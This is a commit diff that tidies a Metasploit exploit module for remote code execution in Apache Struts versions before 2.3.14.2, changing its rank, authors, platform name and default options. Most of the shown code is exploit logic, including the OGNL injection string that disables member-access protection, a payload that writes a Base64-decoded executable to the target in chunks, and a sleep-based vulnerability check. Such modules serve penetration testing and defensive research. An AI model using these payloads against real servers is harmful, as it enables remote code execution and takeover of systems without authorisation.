Do minor cleanup for struts_include_params
jvazquez-r7
parent
a7a754ae1f
commit
146a30ec4d
|
|
@ -8,7 +8,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
|
|
@ -18,17 +18,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Apache Struts includeParams Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote command execution vulnerability in Apache Struts
|
||||
This module exploits a remote command execution vulnerability in Apache Struts
|
||||
versions < 2.3.14.2. A specifically crafted request parameter can be used to inject
|
||||
arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.
|
||||
When targeting an action which requires interaction through GET the payload should
|
||||
be split having into account the uri limits. In this case, if the rendered jsp has
|
||||
more than one point of injection, it could result in payload corruption. It should
|
||||
happen only when the payload is larger than the uri length.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
# This vulnerability was also discovered by unknown members of:
|
||||
# 'Coverity security Research Laboratory'
|
||||
# 'NSFOCUS Security Team'
|
||||
'Eric Kobrin', # Vulnerability Discovery
|
||||
'Douglas Rodrigues', # Vulnerability Discovery
|
||||
'Coverity security Research Laboratory', # Vulnerability Discovery
|
||||
'NSFOCUS Security Team', # Vulnerability Discovery
|
||||
'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
|
||||
'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
|
@ -46,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['Windows Universal',
|
||||
{
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'windows'
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
['Linux Universal',
|
||||
|
|
@ -65,18 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'May 24 2013',
|
||||
'DefaultTarget' => 2))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank3/example/HelloWorld.action"]),
|
||||
OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET', ['GET','POST']]),
|
||||
OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
|
||||
], self.class)
|
||||
|
||||
#initialise some base vars
|
||||
@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
|
||||
@java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()"
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank/example/HelloWorld.action"]),
|
||||
OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),
|
||||
OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
|
@ -90,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})
|
||||
end
|
||||
|
||||
# Display a nice "progress bar" instead of message spam
|
||||
# Display a nice "progress bar" instead of message spam
|
||||
case @notify_flag
|
||||
when 0
|
||||
print_status("Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload")
|
||||
|
|
@ -105,6 +106,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
#initialise some base vars
|
||||
@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
|
||||
@java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()"
|
||||
#Set up generic values.
|
||||
@payload_exe = rand_text_alphanumeric(4+rand(4))
|
||||
pl_exe = generate_payload_exe
|
||||
|
|
@ -172,6 +176,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
#initialise some base vars
|
||||
@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
|
||||
print_status("Performing Check...")
|
||||
sleep_time = datastore['CHECK_SLEEPTIME']
|
||||
check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
|
||||
|
|
|
|||
Loading…
Reference in New Issue